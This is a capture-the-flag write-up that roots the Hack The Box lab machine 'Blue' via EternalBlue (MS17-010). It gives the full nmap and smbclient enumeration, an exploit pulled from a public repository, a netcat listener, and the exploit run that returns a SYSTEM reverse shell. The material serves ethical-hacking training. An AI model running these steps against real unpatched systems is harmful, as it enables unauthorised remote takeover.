HackTheBox Write-up - Blue
Introduction
This article, is aimed at rooting the machine “Blue”, on the online hacking platform — Hack the box.
As always —
Disclaimer As with all things related to ethical hacking, this machine is an intentionally vulnerable machine, whose purpose is to learn ethical hacking techniques. The techniques mentioned should NOT be used for illegal purposes, and should NOT be used on machines without prior authorization from the machine owner.
This was one of my first machines on the platform, and one of the most fun ones. The machine focuses on the “Eternal Blue” exploit that wreaked havoc during the year 2017 across the globe, due to a vulnerable SMB port. This vulnerability was discovered by the NSA at first, and they had developed an exploit for it. However, this exploit was leaked by a group known as the “Shadow Brokers”, and hackers from around the globe started utilizing this to their own advantage. A patch labeled MS17–010 was released by Microsoft soon after, but the damage was already done.
This vulnerability is still seen today, in some older unpatched systems, so better keep an eye out for this one!
Methodology
Scanning and enumeration
Let’s start by doing a bit of scanning to check for open ports on the target machine.
My attacker machine resides at 10.10.14.6 and the victim resides at 10.10.10.40.
> sudo nmap -sS -T4 -p- -A 10.10.10.40 -oA blueTcpAll
Nmap scan report for 10.10.10.40
Host is up (0.26s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
— snip —
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3m38s, deviation: 1s, median: 3m37s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\\x00
| Workgroup: WORKGROUP\\x00
|_ System time: 2020–12–13T03:26:44+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020–12–13T03:26:45
|_ start_date: 2020–12–13T02:52:46
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 259.41 ms 10.10.14.1
2 259.64 ms 10.10.10.40
OS and Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 2021.39 seconds
We see a lot of information here. For starters, SMB is port is open, and we see that the machine is running Windows 7 OS. We could check if anonymous access is allowed, and what files are available on the victim machine. Let’s do that!
> smbclient -L \\\\\\\\10.10.10.40\\\\
Enter WORKGROUP\\kali’s password:
Sharename Type Comment
— — — — — — — — — — -
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Share Disk
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 — no workgroup available
There is a non-default share labelled “Share” on the victim machine. We could check to see what is inside that share.
> smbclient \\\\\\\\10.10.10.40\\\\SHARE
Enter WORKGROUP\\kali’s password:
Try “help” to get a list of possible commands.
smb: \ ls
. D 0 Fri Jul 14 09:48:44 2017
.. D 0 Fri Jul 14 09:48:44 2017
8362495 blocks of size 4096. 3775880 blocks available
Nothing interesting here. I wanted to check if there were any interesting files, such as software configuration files. We could enumerate the other shared folders as well, but there wasn’t anything interesting that would help us at this point. On an actual penetration test, the more you enumerate, the better!
As we saw that SMB is running, we can run an nmap script that checks for all known SMB vulnerabilities. Run the below command:
> sudo nmap — script=smb-vuln* 10.10.10.40 -oA nmapSMBVulnScriptOutput
Starting Nmap 7.91 ( [https://nmap.org](https://nmap.org) ) at 2020–12–12 22:56 EST
Nmap scan report for 10.10.10.40
Host is up (0.26s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Host script results:
|_smb-vuln-ms10–054: false
|_smb-vuln-ms10–061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17–010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17–010)
| State: VULNERABLE
| IDs: CVE:CVE-2017–0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17–010).
|
| Disclosure date: 2017–03–14
| References:
| [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143)
| [https://technet.microsoft.com/en-us/library/security/ms17-010.aspx](https://technet.microsoft.com/en-us/library/security/ms17-010.aspx)
|_ [https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/](https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/)
Nmap done: 1 IP address (1 host up) scanned in 35.67 seconds
From the output above, nmap tells us that the machine is vulnerable to CVE-2017–0143 a.k.a Eternal Blue. This is a gold mine for attackers, as it is extremely easy to take advantage of this vulnerability, using tools such as Metasploit. I would be running an exploit manually here, but this can be done via Metasploit as well.
A bit(lot) of googling led me to: https://root4loot.com/post/eternalblue_manual_exploit/ Full credit goes to the author of this amazing exploit!
Do a git clone of the repo
> git clone [https://github.com/worawit/MS17-010.git](https://github.com/worawit/MS17-010.git)
This generates a folder, that contains 2 kernel shellcode files, and the main exploit(written in python).
Follow the instructions from the above mentioned website, for assembling the shellcode into binaries, to include in our exploit. These binaries consist of the shellcode, as well as the payload (our reverse shell), that would trigger the exploit, and send us a reverse shell. Nasm is the assembler that’s used here. We are creating 32-bit and 64-bit binaries and merging the two, into a single binary. This is useful, if the exploit is triggered against a machine with an unknown architecture (32-bit or 64-bit).
Before running the exploit, let’s set up a listener in a new terminal using netcat.
> sudo nc -nvlp 443
[sudo] password for kali:
listening on [any] 443 ..
Exploitation
Now, let’s run our exploit and get a shell! Make sure to include the IP address of the victim machine, and the generated binary, as the arguments to be used.
> python eternalblue_exploit7.py 10.10.10.40 sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
Ignore the INVALID_PARAMETER error, as this doesn’t affect the success of the exploit.
Let’s go back to our terminal that’s running netcat, and we should have received a shell (Awesome!)
> sudo nc -nvlp 443
[sudo] password for kali:
listening on [any] 443 …
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright © 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
If this hasn’t worked for you, run the exploit again (make sure, to revert the machine on HackTheBox to it’s original state).
Let’s double check the IP address and hostname of the victim machine. Also, as you can see, we are running with full SYSTEM privileges on the target machine.
> C:\Windows\system32>hostname
hostname
haris-PC
C:\Windows\system32>
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::c4d9:ad53:c5c9:7e33
Temporary IPv6 Address. . . . . . : dead:beef::2980:8ddc:2a48:dfea
Link-local IPv6 Address . . . . . : fe80::c4d9:ad53:c5c9:7e33%11
IPv4 Address. . . . . . . . . . . : 10.10.10.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f9ab%11
10.10.10.2
Tunnel adapter isatap.{CBC67B8A-5031–412C-AEA7-B3186D30360E}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system
That’s it! Now go grab those flags and submit them to hackthebox. Hope this article was helpful!